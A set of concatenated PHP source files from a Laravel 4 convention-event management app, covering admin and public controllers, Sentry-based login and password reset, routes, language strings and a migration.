return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('Login field is required.'));
}
catch (Cartalyst\Sentry\Users\PasswordRequiredException $e)
{
return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('Password field is required.'));
}
catch (Cartalyst\Sentry\Users\UserExistsException $e)
{
return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('User with this login already exists.'));
}
return Redirect::action('AdminUsersController@show', $user->id)
->with('success', Lang::get('messages.create_success', array('model' => Lang::get('labels.user'))));
}
return Redirect::action('AdminUsersController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$user = $this->user->findOrFail($id);
$fields = array();
$values = array();
if (ProfileField::all()->count() && $user->profileData->count())
{
$fields = ProfileField::whereHas('events', function($q) use (&$user)
{
$q->whereIn('con_event_id', $user->events()->lists('con_event_id'));
})->orderBy('sort_order')->get();
$allFields = ProfileField::all();
$fields = $allFields;
$values = array();
foreach($allFields as $field)
{
$field_data = $user->profileData()->where('profile_field_id','=', $field->id)->first();
if ($field_data)
{
$values[$field->id] = array(
'value' => $field_data->value,
'visibility' => $field_data->visibility
);
}
}
}
return View::make('admin.users.show', compact('user', 'fields', 'values'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$user = $this->user->find($id);
if (is_null($user))
{
return Redirect::action('AdminUsersController@index')
->with('error', Lang::get('messags.no_user'));
}
return View::make('admin.users.edit', compact('user'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token', 'events', 'groups'));
$validation = Validator::make($input, User::$rules);
if ($validation->passes())
{
$user = $this->user->find($id);
$input['email'] = trim($input['email']);
$user->update($input);
if (Input::has('events'))
{
$user->events()->sync(Input::get('events'));
}
try
{
foreach (Cartalyst\Sentry\Groups\Eloquent\Group::all() as $group)
{
if (Input::has('groups') && in_array($group->getId(), Input::get('groups')))
{
$user->addGroup($group);
}
else
{
$user->removeGroup($group);
}
}
}
catch (Exception $e)
{
$return = Redirect::back()
->with('error', Lang::get('messages.not_found', array('model' => Lang::get('labels.group'))));
}
return Redirect::action('AdminUsersController@show', $user->id)
->with('success', Lang::get('messages.update_success', array('model' => Lang::get('labels.user'))));
}
return Redirect::action('AdminUsersController@edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->user->find($id)->delete();
if (Request::ajax())
{
return json_encode(true);
}
else
{
return Redirect::action('AdminUsersController@index')
->with('success', Lang::get('messages.destroy_success', array('model' => ucfirst(Lang::get('labels.user')))));
}
}
}
<file_sep><?php
class ConEventCategory extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'name_translation' => 'required',
'color' => 'required',
'text_color' => 'required'
);
public function events()
{
return $this->hasMany('ConEvent');
}
}
<file_sep><?php
return array(
"toggle_navigation" => "Toggle Navigation",
'empty_list' => 'No :model.',
"select_country" => "Select Country",
'wrong_password' => '<PASSWORD>!',
'users_can_change_visibility' => 'Users are allowed to change field visibility',
'check_profileField' => "There's already a profile field with this name!",
'check_user' => 'This user already exists!',
'check_event' => "There's already an event with this name!",
'check_venue' => "There's already a venue with this name!",
'validation_errors' => 'There were validation errors!',
'create_success' => ':model successfully created!',
'update_success' => ':model successfully updated!',
'update_error' => ':model could not be updated!',
'not_found' => ':model not found!',
'destroy_success' => ':model successfully deleted!',
'not_selected' => 'No :model selected',
'password_reset_success' => 'Password successfully reset! A new password has been sent to your email.',
'password_change_success' => 'Password successfully changed!',
'password_change_error' => 'Password change failed, please try again!',
'public_data' => 'Display the above information to other users',
'private_data' => 'Only for me and organizers',
'public_info' => 'The following fields are private to you and the organizers unless otherwise stated.',
'validation_error' => 'There were validation errors!',
'confirm_delete' => 'Are you sure you want to delete this resource?',
'invalid_reset_code' => 'Invalid reset code!',
'password_reset_error' => 'Password reset failed, please ty again.',
'password_reminder_sent' => 'Password reminder sent!',
'user_not_found' => 'User not found!',
'login_success' => 'Successfully logged in!',
'logout_success' => 'Successfully logged out!',
'invite_success' => 'Invite sent successfully!',
'invite_error' => 'Something went wrong while sending the invite.',
'no_current_events' => 'no events happening now',
'no_future_events' => 'No future events',
'no_past_events' => 'No past events',
'enter_profile' => 'Please update your profile to make sure we have all the relevant information we need to make your experience as awesome as possible! Click your name in the top right corner to edit your profile.',
'event_subtitle' => 'From :start to :end at :venue',
'activity_subtitle' => ':start to :end at :room',
'never_logged_in' => 'have never logged in',
'all_rooms' => 'Activity takes place in all rooms of the venue',
'hosted_by' => 'Hosted by :hosts',
'co_hosted_by' => 'Co-hosted by :cohosts',
"error_activity_not_open" => "This activity is not open for sign-up!",
"error_activity_full" => "This activity is filled to capacity!",
"success_activity_joined" => "You are now signed up for :activity.",
"success_activity_left" => "You are no longer attending :activity.",
'participants' => 'There are :participants participants from :countries countries.',
'signup_limit_help' => 'The fraction of places (rounded down) being open for sign-up. 0.5 equals 50%, 1.0 equals 100%, etc.',
'signed_up' => 'You have signed up for this activity.',
);
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class CreateProfileFieldsTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('profile_fields', function(Blueprint $table) {
$table->increments('id');
$table->string('name');
$table->enum('type', array('string', 'text', 'option', 'checkbox', 'select', 'multi', 'relation'));
$table->text('options')->nullable();
$table->string('default')->nullable();
$table->string('relation_table')->nullable();
$table->enum('visibility', array('private', 'public'))->default('public');
$table->boolean('visibility_control')->default(false);
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('profile_fields');
}
}
<file_sep><?php
return array(
/**
* Error messages
*/
"error_not_found" => "Venue not found!",
/**
* Success messages
*/
);
<file_sep><?php
class AdminActivitiesController extends BaseController {
/**
* Activity Repository
*
* @var Activity
*/
protected $Activity;
public function __construct(Activity $Activity)
{
$this->Activity = $Activity;
$this->events = array();
foreach(ConEvent::all() as $event) {
$this->events[$event->id] = $event->name;
}
$this->users = array();
foreach(User::all() as $user) {
$this->users[$user['attributes']['id']] = $user['attributes']['name'] ? $user['attributes']['name'] : $user['attributes']['email'];
}
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$activities = Activity::all();
// header('Content-type:text/plain;charset=utf8');
foreach($activities as $activity) {
// dd($activity->event());
}
return View::make('admin.activities.index', compact('activities'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
$events = $this->events;
$users = $this->users;
return View::make('admin.activities.create', compact('events', 'users'));
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
// $input = Input::all();
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, Activity::$rules);
if ($validation->passes())
{
$activity = Activity::create($input);
// if (Input::has('hosts'))
// {
// $hosts = array();
// foreach (Input::get('hosts') as $host) {
// $hosts[$host] = array('host' => true);
// }
// // $activity->hosts()->sync($hosts);
// }
// if (Input::has('participants'))
// {
// // $activity->hosts()->sync(Input::get('participants'));
// }
return Redirect::action('AdminActivitiesController@index')
->with('success', Lang::get('messages.create_success', array('model' => ucfirst(Lang::get('labels.activity')))));
}
return Redirect::action('AdminActivitiesController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$activity = Activity::findOrFail($id);
// dd($activity->hosts);
return View::make('admin.activities.show', compact('activity'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$activity = Activity::find($id);
if ($activity && $activity->venue) {
$rooms = Room::where('venue_id', '=', $activity->venue->id);
}
else {
$rooms = null;
}
if (is_null($activity))
{
return Redirect::action('AdminActivitiesController@index');
}
$users = $this->users;
$events = $this->events;
return View::make('admin.activities.edit', compact('activity', 'events', 'users', 'rooms'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, Activity::$rules);
if ($validation->passes())
{
$activity = Activity::find($id);
$activity->update($input);
if (!Input::has('open'))
{
$activity->open = false;
$activity->save();
}
// if (Input::has('hosts'))
// {
// $hosts = array();
// foreach (Input::get('hosts') as $host) {
// $hosts[$host] = array('host' => true);
// }
// $user->activity->hosts()->sync($hosts);
// }
// if (Input::has('participants'))
// {
// $user->activity->hosts()->sync(Input::get('participants'));
// }
return Redirect::action('AdminActivitiesController@show', $id)
->with('success', Lang::get('messages.update_success', array('model' => ucfirst(Lang::get('labels.activity')))));
}
return Redirect::action('AdminActivitiesController@edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
Activity::find($id)->delete();
return Redirect::action('AdminActivitiesController@index');
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Application Routes
|--------------------------------------------------------------------------
|
| Here is where you can register all of the routes for an application.
| It's a breeze. Simply tell Laravel the URIs it should respond to
| and give it the Closure to execute when that URI is requested.
|
*/
// Assets
Route::get('/js/admin.js', 'AssetsController@jsAdmin');
Route::get('/js/bacon.js', 'AssetsController@jsPublic');
Route::get('/js/external.js', 'AssetsController@jsExternal');
Route::get('/css/admin.css', 'AssetsController@cssAdmin');
Route::get('/css/bacon.css', 'AssetsController@cssPublic');
Route::get('/css/external.css', 'AssetsController@cssExternal');
// Public
Route::controller('event', 'ConEventsController');
Route::controller('activity', 'ActivitiesController');
Route::controller('venue', 'VenuesController');
Route::controller('room', 'RoomsController');
Route::group(array('before' => 'auth'), function()
{
Route::controller('user', 'UsersController');
Route::controller('country', 'CountriesController');
});
// Admin
Route::group(array('before' => 'auth|admin'), function()
{
// Mail debug
Route::controller('mail', 'MailController');
Route::post('admin/users/search', 'AdminUsersController@postSearch');
Route::get('admin/users/contact', 'AdminUsersController@getContact');
Route::get('admin/users/import-data', 'AdminUsersController@getImportData');
Route::post('admin/users/import-data', 'AdminUsersController@postImportData');
Route::get('admin/users/import', 'AdminUsersController@getImport');
Route::post('admin/users/import', 'AdminUsersController@postImport');
Route::get('admin/users/export', 'AdminUsersController@getExport');
Route::post('admin/users/export', 'AdminUsersController@postExport');
Route::get('admin/users/invite/{id}', 'AdminUsersController@invite');
Route::get('admin/users/invite/', 'AdminUsersController@inviteAll');
Route::any('admin/users/check', 'AdminUsersController@check');
Route::resource('admin/users', 'AdminUsersController');
Route::any('admin/events/check', 'AdminConEventsController@check');
Route::get('admin/events/toggle_open/{event}/{action}', 'AdminConEventsController@getToggleOpen');
Route::resource('admin/events', 'AdminConEventsController');
Route::any('admin/venues/check', 'AdminVenuesController@check');
Route::resource('admin/venues', 'AdminVenuesController');
Route::any('admin/fields/check', 'AdminProfileFieldsController@check');
Route::resource('admin/fields', 'AdminProfileFieldsController');
// Route::any('admin/activities/check', 'AdminActivitiesController@check');
Route::resource('admin/activities', 'AdminActivitiesController');
// Route::any('admin/activity_categories/check', 'AdminActivityCategoriesController@check');
Route::resource('admin/activity_categories', 'AdminActivityCategoriesController');
// Route::any('admin/rooms/check', 'AdminRoomsController@check');
Route::resource('admin/rooms', 'AdminRoomsController');
// Route::any('admin/AdminFeaturesController/check', 'AdminFeaturesController@check');
// Route::resource('admin/features', 'AdminFeaturesController');
Route::controller('admin', 'AdminController');
});
// Auth
Route::controller('auth', 'AuthController');
// Index
Route::get('/', array('as' => 'home', 'uses' => 'HomeController@index'));
<file_sep><?php
class AuthController extends BaseController {
/**
* User Repository
*
* @var User
*/
protected $user;
public function __construct()
{
$this->title ='';
$this->messageBag = new Illuminate\Support\MessageBag;
// $this->user = $user;
// $this->user->setHasher(new Cartalyst\Sentry\Hashing\NativeHasher);
}
public function getLogin()
{
return View::make('auth.login');
}
public function postLogin()
{
try
{
// Set login credentials
$credentials = array(
'email' => Input::get('email'),
'password' => Input::get('password'),
);
// Try to authenticate the user
$user = Sentry::authenticate($credentials, (boolean) Input::get('remember'));
}
catch (Cartalyst\Sentry\Users\LoginRequiredException $e)
{
return $this->loginFail('Login field is required.');
}
catch (Cartalyst\Sentry\Users\PasswordRequiredException $e)
{
return $this->loginFail('Password field is required.');
}
catch (Cartalyst\Sentry\Users\WrongPasswordException $e)
{
return $this->loginFail('Wrong password, try again.');
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return $this->loginFail('User was not found.');
}
catch (Cartalyst\Sentry\Users\UserNotActivatedException $e)
{
return $this->loginFail('User is not activated.');
}
// The following is only required if throttle is enabled
catch (Cartalyst\Sentry\Throttling\UserSuspendedException $e)
{
return $this->loginFail('User is suspended.');
}
catch (Cartalyst\Sentry\Throttling\UserBannedException $e)
{
return $this->loginFail('User is banned.');
}
return Redirect::action('HomeController@index')
->with('success', Lang::get('messages.login_success'));;
}
protected function loginFail($message)
{
return Redirect::action('AuthController@getLogin')
->withInput(Input::except('password'))
->with('error', $message);
}
public function getLogout() {
Sentry::logout();
return Redirect::action('HomeController@index')
->with('success', Lang::get('messages.logout_success'));
}
public function getReminder()
{
return View::make('auth.reminder');
}
public function postReminder()
{
try
{
$user = Sentry::findUserByLogin(Input::get('email'));
$email = $user->email;
$code = $user->getResetPasswordCode();
$name = $user->name;
// return View::make('emails.auth.reminder', $data);
Mail::send('emails.auth.reminder', compact('email', 'name', 'code'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.reminder', array('app' => Lang::get('app.name'))));
});
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('AuthController@getReminder')
->withInput()
->with('error', Lang::get('messages.user_not_found'));
}
return Redirect::to('/')
->with('success', Lang::get('messages.password_reminder_sent'));
}
public function getReset($email, $code)
{
try
{
// Find the user using the user id
$user = Sentry::findUserByLogin($email);
$password = <PASSWORD>(8);
$name = $user->name;
// Check if the reset password code is valid
if ($user->checkResetPasswordCode($code))
{
// Attempt to reset the user password
if ($user->attemptResetPassword($code, $password))
{
// Password reset passed
Mail::send('emails.auth.reset', compact('name', 'password'), function($message) use ($email, $name, $password)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.reset', array('app' => Lang::get('app.name'))));
});
return Redirect::action('AuthController@getLogin')
->with('success', Lang::get('messages.password_reset_success'));
}
else
{
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.password_reset_error'));
}
}
else
{
// The provided password reset code is Invalid
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.invalid_reset_code'));
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.user_not_found'));
}
}
public function postReset()
{
try
{
return $this->getReset(Input::get('email'), Input::get('code'));
}
catch (Exception $e)
{
return Redirect::action('AuthController@getReminder')
->with('error', Lang::get('messages.user_not_found'));
}
}
}
<file_sep><?php
return array(
/**
* Error messages
*/
"error_not_found" => "Event not found!",
"error_not_open" => "Event is not open for sign-up!",
/**
* Success messages
*/
"success_joined" => "You are now attending :event.",
"success_left" => "You are no longer attending :event.",
"success_open" => 'Opened all activities for event.',
"success_close" => 'Close all activities for event.',
);
<file_sep><?php
class RoomsController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$rooms = Room::all();
return View::make('rooms.index', compact('rooms'));
}
public function getShow($id)
{
try {
$room = Room::findOrFail($id);
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', 'Room not found!');
}
return View::make('rooms.show', compact('room'));
}
}
<file_sep><?php
class CountriesController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
if ($sort === 'users') {
// $countries = Country::all();
// $countries = Country::with('users')->orderBy('users.id')->get();
foreach (Country::with('users')->get() as $country)
{
if ($country->users->count()) {
// echo $country->users->count() . '<br>';
}
}
}
else {
$countries = Country::orderBy($sort, $order)->get();
}
return View::make('countries.index', compact('countries', 'sort', 'order', 'page'));
}
public function getShow($id)
{
try {
$country = Country::findOrFail($id);
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', 'Country not found!');
}
return View::make('countries.show', compact('country'));
}
}
<file_sep><?php
class AssetsController extends BaseController
{
private $vendorCss = array(
'/css/vendor/bootstrap-3.1.0.min.css',
'/css/vendor/bootstrap-theme-3.1.0.min.css',
'/css/vendor/jquery-ui-1.10.4.css',
'/css/vendor/jquery-ui-timepicker-addon-1.4.3.min.css',
);
private $publicCss = array(
'/css/bacon/public.css'
);
private $adminCss = array(
'/css/bacon/admin.css'
);
private $externalCss = array(
'/css/vendor/bootstrap-3.1.0.min.css',
'/css/vendor/bootstrap-theme-3.1.0.min.css',
'/css/bacon/external.css'
);
private $vendorJs = array(
'/js/vendor/jquery-2.1.0.min.js',
'/js/vendor/jquery-ui-1.10.4.min.js',
'/js/vendor/moment-with-langs-2.5.1.min.js',
'/js/vendor/bootstrap-3.1.0.min.js',
'/js/vendor/jquery.validate-1.11.1.min.js',
// '/js/vendor/additional-methods-1.11.1.min.js',
'/js/vendor/jquery-ui-timepicker-addon-1.4.3.min.js',
// '/js/vendor/bootstrap3-typeahead.js',
);
private $publicJs = array(
'/js/bacon/forms.js',
'/js/bacon/public.js'
);
private $adminJs = array(
'/js/bacon/forms.js',
'/js/bacon/admin.js'
);
private $externalJs = array(
'/js/vendor/bootstrap-3.1.0.min.js',
// '/js/vendor/jquery.validate-1.11.1.min.js',
'/js/vendor/jquery-2.1.0.min.js',
'/js/vendor/jquery-ui-1.10.4.min.js'
);
private function import($files)
{
$path = public_path();
$contents = '';
foreach($files as $file)
{
$file = $path . $file;
if (file_exists($file)) {
$contents .= file_get_contents($file);
}
}
return $contents;
}
private function makeJs($files)
{
$contents = View::make('js.options') . $this->import($files);
$response = Response::make($contents);
$response->header('Content-Type', 'application/javascript');
return $response;
}
private function makeCss($files)
{
$response = Response::make($this->import($files));
$response->header('Content-Type', 'text/css');
return $response;
}
public function jsAdmin()
{
return $this->makeJs(array_merge($this->vendorJs, $this->adminJs));
}
public function jsPublic()
{
return $this->makeJs(array_merge($this->vendorJs, $this->publicJs));
}
public function jsExternal()
{
return $this->makeJs(array_merge($this->externalJs));
}
public function cssAdmin()
{
return $this->makeCss(array_merge($this->vendorCss, $this->adminCss));
}
public function cssPublic()
{
return $this->makeCss(array_merge($this->vendorCss, $this->publicCss));
}
public function cssExternal()
{
return $this->makeCss(array_merge($this->externalCss));
}
}
<file_sep><?php
class Venue extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'location' => 'required',
'description' => 'required'
);
public function rooms()
{
return $this->hasMany('Room');
}
public function events()
{
return $this->hasMany('ConEvent');
}
}
<file_sep><?php
use Illuminate\Console\Command;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputArgument;
class userPassword extends Command {
/**
* The console command name.
*
* @var string
*/
protected $name = 'user:password';
/**
* The console command description.
*
* @var string
*/
protected $description = 'Reset password of a user.';
/**
* Create a new command instance.
*
* @return void
*/
public function __construct()
{
parent::__construct();
}
/**
* Execute the console command.
*
* @return mixed
*/
public function fire()
{
try
{
$email = $this->argument('email');
$password = $this->argument('password');
$user = Sentry::findUserByLogin($email);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
$this->info("Password for $email set to: $password");
}
else
{
$this->error('Password reset failed!');
}
}
else
{
$this->error('The provided password reset code is Invalid!');
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
$this->error('User was not found!');
}
}
/**
* Get the console command arguments.
*
* @return array
*/
protected function getArguments()
{
return array(
array('email', InputArgument::REQUIRED, 'User email'),
array('password', InputArgument::REQUIRED, 'User password'),
);
}
/**
* Get the console command options.
*
* @return array
*/
protected function getOptions()
{
return array();
}
}
<file_sep><?php
class UsersController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex()
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$users = User::orderBy($sort, $order)->paginate(15);
return View::make('users.index', compact('users', 'sort', 'order', 'page'));
}
public function getShow($id)
{
try {
$user = User::findOrFail($id);
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', Lang::get('messages.not_found', array('model' => Lang::get('labels.user'))));
}
$fields = array();
$values = array();
if (ProfileField::all()->count() && $user->profileData->count())
{
$fields = ProfileField::whereHas('events', function($q) use (&$user)
{
$q->whereIn('con_event_id', $user->events()->lists('con_event_id'));
})->orderBy('sort_order')->get();
$allFields = ProfileField::all();
$fields = $allFields;
$values = array();
foreach($allFields as $field)
{
$field_data = $this->user->profileData()->where('profile_field_id','=', $field->id)->first();
if ($field_data)
{
$values[$field->id] = array(
'value' => $field_data->value,
'visibility' => $field_data->visibility
);
}
}
}
return View::make('users.show', compact('user', 'fields', 'values'));
// return $id;
}
public function postEdit()
{
try {
$input = array_only(Input::all(), array('name', 'country_id'));
$validation = Validator::make($input, User::$rules);
if ($validation->passes())
{
$this->user->update($input);
foreach(Input::all() as $key => $value)
{
if (substr($key,0,5) === 'field' && substr($key,-10,10)!=='visibility')
{
$field = explode('_', $key);
$id = $field[2];
$data = array(
'user_id' => $this->user->id,
'profile_field_id' => $id,
'value' => $value,
'visibility' => Input::has($key.'_visibility') ? Input::get($key.'_visibility') : 'private'
);
if (!sizeof($this->user->profileData))
{
$profileData = ProfileData::create($data);
}
else {
try {
$field = $this->user->profileData()->where('profile_field_id','=', $data['profile_field_id'])->firstOrFail();
$field->update($data);
}
catch(Illuminate\Database\Eloquent\ModelNotFoundException $e)
{
$profileData = ProfileData::create($data);
}
}
}
}
return Redirect::action('UsersController@getShow', array($this->user->id))->with('success', Lang::get('messages.update_success', array('model' => Lang::get('labels.user'))));
}
return Redirect::action('UsersController@getEdit')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
catch (Exception $e) {
return Redirect::action('HomeController@index')->with('error', Lang::get('messages.update_error', array('model' => Lang::get('labels.user'))));
}
}
public function getEdit()
{
$countries = Country::formlist();
// $field_ids = ProfileField::all()->lists('id');
$user = $this->user;
$allFields = ProfileField::orderBy('sort_order')->get();
$fields = array();
$values = array();
if (ProfileField::all()->count() && $user->profileData->count())
{
$fields = ProfileField::whereHas('events', function($q) use ($user)
{
$q->whereIn('con_event_id', $user->events()->lists('con_event_id'));
})->orderBy('sort_order')->get();
$fields = $allFields;
$values = array();
foreach($allFields as $field)
{
$values[$field->id] = array('value' => '', 'visibility' => $field->visibility, 'set' => false);
$field_data = $this->user->profileData()->where('profile_field_id','=', $field->id)->first();
if ($field_data)
{
$values[$field->id]['value'] = $field_data->value;
$values[$field->id]['visibility'] = $field_data->visibility;
$values[$field->id]['set'] = true;
}
}
}
// dd($values);
return View::make('users.edit', compact('countries', 'fields', 'allFields', 'values', 'user'));
}
public function postPassword()
{
try {
$input = Input::except('_token');
$rules = array(
'old_password' => '<PASSWORD>',
'password' => '<PASSWORD>',
'password_confirmed' => '<PASSWORD>'
);
$validation = Validator::make($input, $rules);
if ($validation->passes())
{
if (!$this->user->checkPassword(Input::get('old_password')))
{
return Redirect::action('UsersController@getPassword')
->with('error', Lang::get('messages.wrong_password'));
}
if ($this->user->checkResetPasswordCode($this->user->getResetPasswordCode()))
{
if ($this->user->attemptResetPassword($this->user->getResetPasswordCode(), Input::get('password')))
{
return Redirect::action('UsersController@getShow', $this->user->id)
->with('success', Lang::get('messages.password_change_success'));
}
else
{
return Redirect::action('UsersController@getPassword')
->with('error', Lang::get('messages.password_change_error'));
}
}
else
{
return Redirect::action('UsersController@getPassword')
->with('error', Lang::get('messages.password_change_error'));
}
}
else {
return Redirect::action('UsersController@getPassword')
->withErrors($validation);
}
}
catch(Exception $e)
{
throw $e;
}
}
public function getPassword()
{
$user = $this->user;
return View::make('users.change_password', compact('user'));
}
}
<file_sep><?php
class MailController extends BaseController
{
public function getInvite()
{
$name = 'NAME';
$email = 'EMAIL';
$password = '<PASSWORD>';
return View::make('emails.auth.invite', compact('name', 'email', 'password'));
}
public function getReminder()
{
$name = 'NAME';
$email = 'EMAIL';
$code = 'CODE';
return View::make('emails.auth.reminder', compact('name', 'email', 'code'));
}
public function getReset()
{
$name = 'NAME';
$password = '<PASSWORD>';
return View::make('emails.auth.reset', compact('name', 'password'));
}
}
<file_sep><?php
class HomeController extends BaseController
{
public function index()
{
$today = Carbon::now()->startOfDay();
$tomorrow = $today->copy()->addDay();
$events = ConEvent::all();
$events_current = ConEvent::where('starts_at', '<=', $today->toDateTimeString())
->where('starts_at', '<', $tomorrow->toDateTimeString())
->get();
$events_future = ConEvent::where('starts_at', '>', $tomorrow->toDateTimeString())->get();
$events_past = ConEvent::where('ends_at', '<', $today->toDateTimeString())->get();
if (Sentry::check())
{
// Session::flash('info', Lang::get('messages.enter_profile'));
}
return View::make('home.index', compact('events','events_current', 'events_future', 'events_past'));
}
}
<file_sep><?php
return array(
/*
|--------------------------------------------------------------------------
| Email localization strings
|--------------------------------------------------------------------------
|
| Strings to localize emails
|
*/
'subject' => array(
'reminder' => ':app Password Reminder',
'reset' => ':app Password Reset',
'invite' => ':app Invitation',
),
'body' => array()
);
<file_sep><?php
return array(
"profile" => "Profile",
"edit_profile" => "Edit Profile",
"change_password" => "<PASSWORD>",
"log_in" => "Log In",
"no_login" => "Never logged in",
"last_login" => "Last Login",
"log_out" => "Log Out",
"yes" => "Yes",
"no" => "No",
'name' => 'Name',
'email' => 'E-mail',
'password' => '<PASSWORD>',
'old_password' => '<PASSWORD>',
'new_password' => '<PASSWORD>',
'confirm_password' => '<PASSWORD>',
'country' => 'Country',
'no_country' => 'No country selected',
'countries' => 'Countries',
"select_country" => "Select Country",
"select_value" => "",
'event' => 'Event',
'hosts' => 'Hosts',
'cohosts' => 'Co-hosts',
'list' => 'List',
'capacity' => 'Capacity',
'activity_open' => 'Open for sign-up',
'starts_at' => 'Starts At',
'ends_at' => 'Ends At',
'location' => 'Location',
'home' => 'Home',
'description' => 'Description',
// Users
"user" => "User",
"users" => "Users",
"select_user" => "Select User",
"group" => "Group",
"groups" => "Groups",
"select_group" => "Select Group",
// Events
"event" => "Event",
"events" => "Events",
"select_event" => "Select Event",
'events_empty' => 'No events',
"activity" => "Activity",
"activities" => "Activities",
"select_activity" => "Select Activity",
'activities_empty' => 'No activities',
'my_activities' => 'My activities',
'category' => 'Category',
'categories' => 'Categories',
'select_category' => 'Select category',
'categories_empty' => 'No categories',
"activity_category" => "Activity Category",
"activity_categories" => "Activity Categories",
"select_activity_category" => "Select Category",
'activity_categories_empty' => 'No activity categories',
"room" => "Room",
"rooms" => "Rooms",
"select_room" => "Select Room",
'rooms_empty' => 'No rooms',
"participant" => "Participant",
"participants" => "Participants",
"participants_empty" => "No Participants",
// Profile Fields
"field" => "Profile Field",
"fields" => "Profile Fields",
"venue" => "Venue",
"venues" => "Venues",
"select_venue" => "Select Venue",
'field_type' => 'Type',
// Field types
'type' => array(
'string' => 'Text',
'text' => 'Textfield',
'option' => 'Radio options',
'checkbox' => 'Checkboxes',
'select' => 'Select List',
'multi' => 'Multi-select List',
'relation' => 'Relation',
),
'rules' => 'Validation Rules',
'visibility' => 'Visibility',
'visibility_control' => 'User can set visibility',
'sort_order' => 'Sort Order',
'public' => 'Public',
'private' => 'Private',
'help' => 'Help',
'options' => 'Options',
'default' => 'Default',
'relation_table' => 'Relation Table',
'login' => 'Log In',
'remember_me' => 'Remember me',
'remind_me' => 'Remind me',
'forgot_password' => 'Forgot <PASSWORD>?',
'save'=> 'Save',
'created_at' => 'Created At',
'updated_at' => 'Updated At',
'data' => 'Data',
'events_future' => 'Upcoming Events',
'events_current' => 'Events Happening Now',
'events_past' => 'Past Events',
'to' => '–',
'color' => 'Color',
'text_color' => 'Text Color',
'schedule' => 'Schedule',
'all_rooms' => 'All rooms',
'unknown' => 'Unknown',
'attending' => 'Attending',
'not_attending' => 'Not attending',
'toggle_open' => 'Toggle open',
'open_event' => 'Open event',
'close_event' => 'Close event',
'signup_limit' => 'Sign-up Limit',
'search' => 'Search',
);
<file_sep><?php
class AdminConEventsController extends AdminBaseController {
/**
* ConEvent Repository
*
* @var ConEvent
*/
protected $event;
public function __construct(ConEvent $event)
{
$this->event = $event;
$this->breadcrumbs = array(
array('path' => '/admin', 'label' => 'Admin'),
array('path' => '/admin/events', 'label' => 'Events')
);
// Set up checker
$this->checkModel = 'ConEvent';
$this->checkMessage = 'messages.check_event';
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$events = $this->event->all();
$breadcrumbs = $this->breadcrumbs;
return View::make('admin.events.index', compact('events', 'breadcrumbs'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
return View::make('admin.events.create');
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
$input = Input::all();
$validation = Validator::make($input, ConEvent::$rules);
if ($validation->passes())
{
$this->event->create($input);
return Redirect::route('admin.events.index');
}
return Redirect::route('admin.events.create')
->withInput()
